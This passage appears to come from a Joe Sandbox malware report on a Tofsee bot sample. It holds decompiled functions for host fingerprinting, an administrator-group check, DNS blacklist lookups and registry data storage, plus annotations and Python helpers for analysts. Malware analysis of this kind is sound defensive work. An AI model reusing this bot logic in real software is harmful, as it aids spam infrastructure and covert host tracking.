                                                                                				_push( &_v12);
                                                                                				_v8 = 0;
                                                                                				_v12 = 0;
                                                                                				_push(0);
                                                                                				while(1) {
                                                                                					_t41 =  *_t28(2, 0, 0);
                                                                                					if(_t41 != 0x6f) {
                                                                                						break;
                                                                                					}
                                                                                					_t24 = E0040EBED(_v8, _v12);
                                                                                					if(_t24 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_push( &_v12);
                                                                                					_v8 = _t24;
                                                                                					_push(_t24);
                                                                                				}
                                                                                				if(_t41 != 0) {
                                                                                					L11:
                                                                                					if(_v8 != 0) {
                                                                                						E0040EC2E(_v8);
                                                                                					}
                                                                                					L13:
                                                                                					goto L14;
                                                                                				}
                                                                                				_t26 = _v8;
                                                                                				if(_t26 == 0) {
                                                                                					goto L13;
                                                                                				} else {
                                                                                					goto L8;
                                                                                				}
                                                                                				do {
                                                                                					L8:
                                                                                					_t43 =  *((intOrPtr*)(_t26 + 0x34));
                                                                                					_t39 = 0;
                                                                                					if(_t43 <= 0) {
                                                                                						goto L10;
                                                                                					} else {
                                                                                						goto L9;
                                                                                					}
                                                                                					do {
                                                                                						L9:
                                                                                						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
                                                                                						_t39 = _t39 + 1;
                                                                                					} while (_t39 < _t43);
                                                                                					L10:
                                                                                					_t26 =  *((intOrPtr*)(_t26 + 8));
                                                                                				} while (_t26 != 0);
                                                                                				goto L11;
                                                                                			}
                                                                                0x00401ad1
                                                                                0x00401ad4
                                                                                0x00401adc
                                                                                0x00401b6b
                                                                                0x00401b70
                                                                                0x00401b70
                                                                                0x00401aef
                                                                                0x00401af3
                                                                                0x00401b6a
                                                                                0x00000000
                                                                                0x00401b6a
                                                                                0x00401af9
                                                                                0x00401afa
                                                                                0x00401afd
                                                                                0x00401b00
                                                                                0x00401b1c
                                                                                0x00401b22
                                                                                0x00401b27
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401b09
                                                                                0x00401b12
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401b17
                                                                                0x00401b18
                                                                                0x00401b1b
                                                                                0x00401b1b
                                                                                0x00401b2b
                                                                                0x00401b5b
                                                                                0x00401b5e
                                                                                0x00401b63
                                                                                0x00401b68
                                                                                0x00401b69
                                                                                0x00000000
                                                                                0x00401b69
                                                                                0x00401b2d
                                                                                0x00401b32
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401b34
                                                                                0x00401b34
                                                                                0x00401b34
                                                                                0x00401b37
                                                                                0x00401b3b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401b3d
                                                                                0x00401b3d
                                                                                0x00401b4c
                                                                                0x00401b4f
                                                                                0x00401b50
                                                                                0x00401b54
                                                                                0x00401b54
                                                                                0x00401b57
                                                                                0x00000000

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                • API String ID: 2574300362-1087626847
                                                                                • Opcode ID: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                • Instruction ID: f6c238f91e07a5798e813b0b618c72a9a5addbcd8e0b61e0281ff71d4ef1483f
                                                                                • Opcode Fuzzy Hash: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                • Instruction Fuzzy Hash: 3D11DA71E01124BFCB11DBA5DD858EEBBB9EB44B10B144077E005F72A1E7786E80CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                 C-Code - Quality: 76%
                                                                                 // Host-ID derivation. Order of preference: the value from E00401AC3 (which, per the subcall
                                                                                 // APIs listed below, resolves GetAdaptersAddresses from Iphlpapi.dll), then an XOR hash of
                                                                                 // the computer name, then the volume serial number of the current drive.
                                                                                 			E00401BDF() {
                                                                                 				long _v8;            // in/out buffer size for GetComputerNameA (set to 0xf)
                                                                                 				long _v12;           // receives the volume serial number
                                                                                 				void* _v27;
                                                                                 				char _v28;           // 16-byte computer-name buffer, zeroed below
                                                                                 				void* _t14;
                                                                                 				signed int _t21;     // byte index into the name
                                                                                 				signed int _t30;     // running XOR hash
                                                                                 				void* _t31;
                                                                                 
                                                                                 				_v28 = 0;
                                                                                 				asm("stosd");        // zero the remaining 15 bytes of the name buffer
                                                                                 				asm("stosd");
                                                                                 				asm("stosd");
                                                                                 				asm("stosw");
                                                                                 				_t30 = 0;
                                                                                 				_v12 = 0;
                                                                                 				asm("stosb");
                                                                                 				_v8 = 0xf;
                                                                                 				_t14 = E00401AC3();
                                                                                 				if(_t14 == 0) {
                                                                                 					// The buffer holds 14 characters plus the terminator; a longer name makes GetComputerNameA
                                                                                 					// fail (ERROR_BUFFER_OVERFLOW), so such hosts get the volume-serial ID instead.
                                                                                 					if(GetComputerNameA( &_v28,  &_v8) == 0) {
                                                                                 						L6:
                                                                                 						// Fallback: the fourth argument receives the volume serial number of the current drive
                                                                                 						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
                                                                                 						return _v12;
                                                                                 					}
                                                                                 					_t21 = 0;
                                                                                 					if(_v8 <= 0) {
                                                                                 						goto L6;
                                                                                 					} else {
                                                                                 						goto L3;
                                                                                 					}
                                                                                 					do {
                                                                                 						L3:
                                                                                 						// XOR byte i of the name into the 32-bit hash. The decompiler prints the shift as
                                                                                 						// "<< (i & 3) << 3"; this is most likely the shift count (i & 3) << 3, i.e. the byte lands
                                                                                 						// in lane i mod 4 of the word (bit (i & 3) * 8). The disassembly is not shown here.
                                                                                 						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
                                                                                 						_t21 = _t21 + 1;
                                                                                 					} while (_t21 < _v8);
                                                                                 					if(_t30 == 0) {
                                                                                 						goto L6;         // an all-zero hash also falls back to the volume serial
                                                                                 					}
                                                                                 					return _t30;
                                                                                 				}
                                                                                 				return _t14;
                                                                                 			}











                                                                                 Line addresses (code gutter): 0x00401bec 0x00401bf2 0x00401bf3 0x00401bf4 0x00401bf5 0x00401bf7 0x00401bf9 0x00401bfc 0x00401bfd 0x00401c04 0x00401c0b 0x00401c1d 0x00401c45 0x00401c51 0x00000000 0x00401c57 0x00401c1f 0x00401c24 0x00000000 0x00000000 0x00000000 0x00000000 0x00401c26 0x00401c26 0x00401c35 0x00401c37 0x00401c38 0x00401c3f 0x00000000 0x00000000 0x00000000 0x00401c41 0x00401c5e

                                                                                APIs
                                                                                  • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                  • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                • GetComputerNameA.KERNEL32 ref: 00401C15
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00401C51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                • String ID: hi_id$localcfg
                                                                                • API String ID: 2777991786-2393279970
                                                                                • Opcode ID: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                • Instruction ID: b3a67a5cb4ed68e183e77afdc8505cc80d304e276af6d439446d09174096bcc5
                                                                                • Opcode Fuzzy Hash: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                • Instruction Fuzzy Hash: B2018072A44118BBEB10EAE8C8C59EFBABCAB48745F104476E602F3290D274DE4486A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
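
The host-ID logic of E00401BDF above, modelled in Python as an added example (not code from the sample, from Joe Sandbox or from the report) so that the value can be reproduced for a given machine and compared with what is seen on the wire. Assumptions: the shift count is (i & 3) * 8 as read from the decompiled shift, the adapter-based value from E00401AC3 is treated as an opaque integer that wins when non-zero, and the inputs in the usage line are constructed.

```python
from __future__ import annotations

# Added example modelling E00401BDF (Tofsee host-ID selection). Not the sample's code.
# Assumption: the decompiled "<< (i & 3) << 3" is a shift by (i & 3) * 8 bits.

NAME_BUFFER_SIZE = 0xF          # nSize passed to GetComputerNameA (15 bytes incl. terminator)


def derive_host_id(computer_name: bytes, volume_serial: int, adapter_id: int = 0) -> tuple[int, str]:
    """Return (host_id, source) the way E00401BDF selects it.

    adapter_id    - value returned by the subcall E00401AC3 (adapter based, not shown on the page);
                    assumed here to be an opaque 32-bit integer. Any non-zero value wins outright.
    computer_name - what GetComputerNameA returns (NetBIOS name, no terminator).
    volume_serial - the serial GetVolumeInformationA writes into its fourth argument.
    """
    if adapter_id:
        return adapter_id & 0xFFFFFFFF, "adapter"
    # A name that does not fit in the 15-byte buffer together with its terminator makes
    # GetComputerNameA fail (ERROR_BUFFER_OVERFLOW); the code then takes the volume serial.
    if len(computer_name) > NAME_BUFFER_SIZE - 1:
        return volume_serial & 0xFFFFFFFF, "volume_serial"
    h = 0
    for i, b in enumerate(computer_name):
        # Byte i is XORed into lane i mod 4 of the 32-bit word (assumed shift count (i & 3) * 8).
        h ^= b << ((i & 3) * 8)
    h &= 0xFFFFFFFF
    # An all-zero hash (e.g. an empty name) also falls back to the volume serial.
    if h == 0:
        return volume_serial & 0xFFFFFFFF, "volume_serial"
    return h, "computer_name"


def tofsee_host_id(computer_name: bytes, volume_serial: int, adapter_id: int = 0) -> int:
    """Just the 32-bit ID, for callers that do not care which source produced it."""
    return derive_host_id(computer_name, volume_serial, adapter_id)[0]


if __name__ == "__main__":
    # Constructed inputs, not taken from the analysed machine.
    for name in (b"WIN-ABC", b"", b"DESKTOP-ABCDEFG"):
        value, source = derive_host_id(name, 0x12345678)
        print("%-16r -> 0x%08x (%s)" % (name, value, source))
```

The hash is weak by design: only four lanes of XOR, so two machines whose names differ in the right positions collide, and the 15-byte buffer means that any host with a 15-character NetBIOS name is identified by its volume serial rather than its name. Both properties matter when correlating bots across sandbox runs.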

                                                                                 C-Code - Quality: 68%
                                                                                 // Cached check whether the current token belongs to BUILTIN\Administrators. The global at
                                                                                 // 0x412048 starts at -1 (not yet evaluated); after the first call it holds 0 when the token is
                                                                                 // a member, otherwise whatever E00406E36(0x12, 0) returns (that function is not shown here).
                                                                                 			E00406EDD() {
                                                                                 				int _v8;                                   // IsMember result from CheckTokenMembership
                                                                                 				void* _v12;                                // PSID
                                                                                 				short _v16;                                // last two bytes of the identifier authority
                                                                                 				struct _SID_IDENTIFIER_AUTHORITY _v20;
                                                                                 				signed int _t12;
                                                                                 				int _t15;
                                                                                 				int* _t16;
                                                                                 
                                                                                 				_t12 =  *0x412048; // 0xffffffff
                                                                                 				if(_t12 < 0) {
                                                                                 					// Identifier authority {0,0,0,0,0,5} = SECURITY_NT_AUTHORITY: the dword write covers
                                                                                 					// bytes 0..3 and the word 0x0500, stored little-endian, supplies bytes 4..5 as 00 05.
                                                                                 					_v20.Value = 0;
                                                                                 					_v16 = 0x500;
                                                                                 					// Two sub-authorities, 0x20 (SECURITY_BUILTIN_DOMAIN_RID) and 0x220 (DOMAIN_ALIAS_RID_ADMINS):
                                                                                 					// the SID is S-1-5-32-544, BUILTIN\Administrators.
                                                                                 					_t15 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                                                                 					_v8 = _t15;
                                                                                 					if(_t15 != 0) {
                                                                                 						_t6 =  &_v8; // 0x40702a
                                                                                 						_t16 = _t6;
                                                                                 						// TokenHandle 0: the calling thread's impersonation token, or its primary token when it
                                                                                 						// is not impersonating
                                                                                 						__imp__CheckTokenMembership(0, _v12, _t16);
                                                                                 						// Decompiler artefact: _t16 is &_v8 and can never be 0; the test is most likely on the
                                                                                 						// BOOL the call returned.
                                                                                 						if(_t16 != 0) {
                                                                                 							 *0x412048 = 0 | _v8 == 0x00000000;   // 1 if not a member, 0 if a member
                                                                                 						}
                                                                                 						FreeSid(_v12);
                                                                                 					}
                                                                                 					_t12 =  *0x412048; // 0xffffffff
                                                                                 					if(_t12 != 0) {
                                                                                 						_t12 = E00406E36(0x12, 0);
                                                                                 						 *0x412048 = _t12;
                                                                                 					}
                                                                                 				}
                                                                                 				return _t12;
                                                                                 			}










                                                                                 Line addresses (code gutter): 0x00406ee0 0x00406eed 0x00406f06 0x00406f09 0x00406f0f 0x00406f15 0x00406f1a 0x00406f1c 0x00406f1c 0x00406f24 0x00406f2c 0x00406f36 0x00406f36 0x00406f3e 0x00406f3e 0x00406f44 0x00406f4b 0x00406f50 0x00406f57 0x00406f57 0x00406f4b 0x00406f5e

                                                                                APIs
                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
                                                                                • FreeSid.ADVAPI32(?), ref: 00406F3E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                • String ID: *p@
                                                                                • API String ID: 3429775523-2474123842
                                                                                • Opcode ID: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                • Instruction ID: a55d58a6849641b9de595c9770ce5785232f8714219103e6702645194e06a02f
                                                                                • Opcode Fuzzy Hash: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                • Instruction Fuzzy Hash: 6701E571904209AFDB10DFE4ED85AAE7BB8F708304F50847AE606E2191D7745A54CB18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
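
To name the group E00406EDD tests for without reaching for a SID table by hand, the following added example (not code from the sample, from Joe Sandbox or from the report) parses an AllocateAndInitializeSid line in the report's API format, combines it with the authority bytes the function writes on the stack, and produces the SID string, its well-known name and its binary encoding (handy as a byte pattern). The report line is copied into a constant, the well-known-SID table is a small constructed subset, and the helper names are this example's own.

```python
from __future__ import annotations
import re
import struct

# Added example, not code from the sample or the report: decode the SID that E00406EDD builds.

WELL_KNOWN_SIDS = {                       # constructed subset of the well-known SIDs
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
}

# Copy of the report's API line for the call at 00406F0F (same content as logged above).
REPORT_LINE = ("AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,"
               "00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F")


def parse_report_call(line: str) -> tuple[str, list[str]]:
    """Split 'Api.MODULE(arg,arg,...), ref: ADDR' into (api name, argument strings).
    Arguments the sandbox could not resolve stay as '?'."""
    m = re.match(r"\s*•?\s*(\w+)\.\w+\((.*?)\),", line)
    if not m:
        raise ValueError("not a report API line: %r" % line)
    return m.group(1), m.group(2).split(",")


def authority_from_stack(value_dword: int, value_word: int) -> bytes:
    """E00406EDD fills SID_IDENTIFIER_AUTHORITY with a 4-byte write (_v20.Value = 0) followed by a
    little-endian 2-byte write (_v16 = 0x500); together they form the 6-byte authority."""
    return struct.pack("<IH", value_dword, value_word)


def sid_from_allocate_call(args: list[str], authority: bytes) -> str:
    """AllocateAndInitializeSid(pAuthority, nSubAuthorityCount, sub0..sub7, pSid) -> 'S-1-A-s0-s1'."""
    count = int(args[1], 16)
    subs = [int(a, 16) for a in args[2:2 + count]]
    ident = int.from_bytes(authority, "big")        # the authority is a big-endian 48-bit value
    return "S-1-%d%s" % (ident, "".join("-%d" % s for s in subs))


def sid_to_bytes(sid: str) -> bytes:
    """Binary SID layout: revision 1, sub-authority count, 6-byte authority, LE sub-authorities."""
    parts = sid.split("-")
    ident, subs = int(parts[2]), [int(p) for p in parts[3:]]
    return (bytes([1, len(subs)]) + ident.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def describe_sid_call(line: str, authority: bytes) -> tuple[str, str, str]:
    """(SID string, well-known name or 'unknown', hex of the binary SID) for one report line."""
    api, args = parse_report_call(line)
    if api != "AllocateAndInitializeSid":
        raise ValueError("expected AllocateAndInitializeSid, got " + api)
    sid = sid_from_allocate_call(args, authority)
    return sid, WELL_KNOWN_SIDS.get(sid, "unknown"), sid_to_bytes(sid).hex()


if __name__ == "__main__":
    print(describe_sid_call(REPORT_LINE, authority_from_stack(0, 0x500)))
```

The authority bytes are the part a report alone cannot show, since the sandbox logs a `?` for the pointer argument; they have to be taken from the stack writes in the decompiled function, which is why the example takes them as a separate parameter.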

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynameinet_addr
                                                                                • String ID: time_cfg$u6A
                                                                                • API String ID: 1594361348-1940331995
                                                                                • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                • Instruction ID: b13e1236de4f5062c8b5a49233bd66f005b669dfcd824bf3ad8064169c87c9a0
                                                                                • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                • Instruction Fuzzy Hash: CEE08C306041119FCB008B28F848AC53BA4AF4A330F008188F180E31A0C7349C81E644
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetFileAttributesA.KERNEL32(?,00000080), ref: 00E369E5
                                                                                • SetFileAttributesA.KERNEL32(?,00000002), ref: 00E36A26
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 00E36A3A
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00E36BD8
                                                                                  • Part of subcall function 00E3EE95: GetProcessHeap.KERNEL32(00000000,?,00000000,00E31DCF,?), ref: 00E3EEA8
                                                                                  • Part of subcall function 00E3EE95: HeapFree.KERNEL32(00000000), ref: 00E3EEAF
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesHeap$CloseFreeHandleProcessSize
                                                                                • String ID:
                                                                                • API String ID: 3384756699-0
                                                                                • Opcode ID: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                • Instruction ID: 565370fc42983b4acd496026c01cc8cc92145c81112137fac699111af498da63
                                                                                • Opcode Fuzzy Hash: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                • Instruction Fuzzy Hash: 6B71F471900219BFDB109FA4CC84AEEBFB9FB04354F10956AE515F6190D7309E92DF60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                 C-Code - Quality: 100%
                                                                                 // Blacklist lookup over a list of zones. Arguments: a 32-bit address at [_t105+0x78] and a
                                                                                 // comma-separated list of zone names at [_t105+0x7c]. For zone i the routine formats
                                                                                 // "<byte3>.<byte2>.<byte1>.<byte0>.<zone>" (the address bytes printed from the highest down,
                                                                                 // i.e. reversed octets when the value is in network byte order, the form a DNSBL query takes),
                                                                                 // hands the name to E00402684 (not shown; presumably the lookup) and sets bit i of the result on
                                                                                 // a non-zero answer. The counter stops past 0x1e, so at most 31 zones are consulted and the
                                                                                 // return value is a bitmask of the zones that answered.
                                                                                 			E00401C5F(void* __eflags) {
                                                                                 				signed int _t49;
                                                                                 				signed int _t51;
                                                                                 				void* _t80;
                                                                                 				char _t91;
                                                                                 				void* _t92;
                                                                                 				signed int _t98;
                                                                                 				void* _t101;
                                                                                 				void* _t102;
                                                                                 				void* _t103;
                                                                                 				void* _t105;
                                                                                 				void* _t107;
                                                                                 				void* _t108;
                                                                                 
                                                                                 				_t105 = _t107 - 0x70;
                                                                                 				_t108 = _t107 - 0x114;
                                                                                 				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) & 0x00000000;     // result bitmask = 0
                                                                                 				_t98 =  *(_t105 + 0x7c);                                 // cursor into the zone list
                                                                                 				 *(_t105 + 0x7c) =  *(_t105 + 0x7c) & 0x00000000;     // the slot is reused as the zone counter
                                                                                 				_t101 = E0040ED03(_t98, 0x2c);                           // next ',' (0x2c); strchr-like, not shown
                                                                                 				if(_t101 == 0) {
                                                                                 					L6:
                                                                                 					// Last (or only) zone: two strlen loops, copy it to the buffer at _t105 - 0x24, format, test.
                                                                                 					_t49 = _t98;
                                                                                 					_t32 = _t49 + 1; // 0x2
                                                                                 					_t102 = _t32;
                                                                                 					do {
                                                                                 						_t91 =  *_t49;
                                                                                 						_t49 = _t49 + 1;
                                                                                 					} while (_t91 != 0);
                                                                                 					 *((char*)(_t105 + _t49 - _t102 - 0x24)) = _t91;
                                                                                 					_t51 = _t98;
                                                                                 					_t35 = _t51 + 1; // 0x2
                                                                                 					_t103 = _t35;
                                                                                 					do {
                                                                                 						_t92 =  *_t51;
                                                                                 						_t51 = _t51 + 1;
                                                                                 					} while (_t92 != 0);
                                                                                 					E0040EE5C(_t105 - 0x24, _t98, _t51 - _t103);            // copy the zone name (memcpy-like, not shown)
                                                                                 					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x7b) & 0x000000ff,  *(_t105 + 0x7a) & 0x000000ff,  *(_t105 + 0x79) & 0x000000ff,  *(_t105 + 0x78) & 0x000000ff, _t105 - 0x24);
                                                                                 					if(E00402684(_t105 - 0xa4) != 0) {
                                                                                 						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);   // set the bit for this zone
                                                                                 					}
                                                                                 					L12:
                                                                                 					return  *(_t105 + 0x6c);
                                                                                 				}
                                                                                 				// Cache the four address bytes zero-extended: 0x5c = byte0 (0x78) ... 0x64 = byte3 (0x7b)
                                                                                 				 *(_t105 + 0x5c) =  *(_t105 + 0x78) & 0x000000ff;
                                                                                 				 *(_t105 + 0x60) =  *(_t105 + 0x79) & 0x000000ff;
                                                                                 				 *(_t105 + 0x68) =  *(_t105 + 0x7a) & 0x000000ff;
                                                                                 				 *(_t105 + 0x64) =  *(_t105 + 0x7b) & 0x000000ff;
                                                                                 				while(1) {
                                                                                 					 *((char*)(_t105 + _t101 - _t98 - 0x24)) = 0;           // terminate the copy where the comma was
                                                                                 					E0040EE5C(_t105 - 0x24, _t98, _t101 - _t98);             // copy this zone name
                                                                                 					_t22 = _t101 + 1; // 0x1
                                                                                 					_t98 = _t22;                                             // advance the cursor past the comma
                                                                                 					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x64),  *(_t105 + 0x68),  *(_t105 + 0x60),  *(_t105 + 0x5c), _t105 - 0x24);
                                                                                 					_t80 = E00402684(_t105 - 0xa4);
                                                                                 					_t108 = _t108 + 0x2c;                                    // 0x2c bytes of cdecl cleanup for the three calls above (3 + 7 + 1 dwords)
                                                                                 					if(_t80 != 0) {
                                                                                 						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);   // set the bit for this zone
                                                                                 					}
                                                                                 					 *(_t105 + 0x7c) =  *(_t105 + 0x7c) + 1;
                                                                                 					if( *(_t105 + 0x7c) > 0x1e) {
                                                                                 						goto L12;                                            // cap: zones 0..30 only
                                                                                 					}
                                                                                 					_t101 = E0040ED03(_t98, 0x2c);
                                                                                 					if(_t101 != 0) {
                                                                                 						continue;
                                                                                 					}
                                                                                 					goto L6;
                                                                                 				}
                                                                                 				goto L12;
                                                                                 			}

                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Similarity
                                                                                • API ID: wsprintf
                                                                                • String ID: %u.%u.%u.%u.%s$localcfg
                                                                                • API String ID: 2111968516-120809033
                                                                                • Opcode ID: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                • Instruction ID: f60862e96afe744063ef1f8e151e0253a3d6131670b42bf9f562b78b9aabf051
                                                                                • Opcode Fuzzy Hash: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                • Instruction Fuzzy Hash: 3C41C1729042999FDB21DF798D44BEE7BE89F49310F240066FD64E3192D639EA04CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040E095(void* _a4, char* _a8, intOrPtr* _a12, char* _a16, int _a20) {
                                                                                				int _v8;
                                                                                				char* _v12;
                                                                                				void* _v16;
                                                                                				char _v48;
                                                                                				intOrPtr* _t34;
                                                                                				int _t50;
                                                                                				void* _t52;
                                                                                				intOrPtr _t53;
                                                                                				int _t57;
                                                                                				int _t58;
                                                                                				void* _t59;
                                                                                				void* _t60;
                                                                                				void* _t61;
                                                                                
                                                                                				_t57 = 0;
                                                                                				if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20106, 0,  &_v16, 0) != 0) {
                                                                                					return 0;
                                                                                				}
                                                                                				_v12 = _a16;
                                                                                				_t34 = _a12;
                                                                                				_t52 = _t34 + 1;
                                                                                				do {
                                                                                					_t53 =  *_t34;
                                                                                					_t34 = _t34 + 1;
                                                                                				} while (_t53 != 0);
                                                                                				_t55 = _t34 - _t52;
                                                                                				_v8 = 0;
                                                                                				if(_t34 - _t52 > 0x1c) {
                                                                                					_t55 = 0x1c;
                                                                                				}
                                                                                				E0040EE08( &_v48, _a12, _t55);
                                                                                				_t50 = _a20;
                                                                                				_t61 = _t60 + 0xc;
                                                                                				if(_t50 <= _t57) {
                                                                                					L11:
                                                                                					E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
                                                                                					RegDeleteValueA(_v16,  &_v48);
                                                                                					RegCloseKey(_v16);
                                                                                					return 0 | _t50 == _t57;
                                                                                				} else {
                                                                                					while(1) {
                                                                                						_t58 = 0xff000;
                                                                                						if(_t50 < 0xff000) {
                                                                                							_t58 = _t50;
                                                                                						}
                                                                                						E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
                                                                                						_t61 = _t61 + 0xc;
                                                                                						if(RegSetValueExA(_v16,  &_v48, 0, 3, _v12, _t58) != 0) {
                                                                                							break;
                                                                                						}
                                                                                						_v12 =  &(_v12[_t58]);
                                                                                						_t50 = _t50 - _t58;
                                                                                						_v8 = _v8 + 1;
                                                                                						if(_t50 > 0) {
                                                                                							continue;
                                                                                						}
                                                                                						break;
                                                                                					}
                                                                                					_t57 = 0;
                                                                                					goto L11;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
                                                                                • RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,004122F8), ref: 0040E127
                                                                                • RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,004122F8), ref: 0040E158
                                                                                • RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Similarity
                                                                                • API ID: Value$CloseCreateDelete
                                                                                • String ID:
                                                                                • API String ID: 2667537340-0
                                                                                • Opcode ID: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
                                                                                • Instruction ID: af4a942e7328ea1ce2cdf979f73f75556816175b5134196b99f0fb832a21e1c2
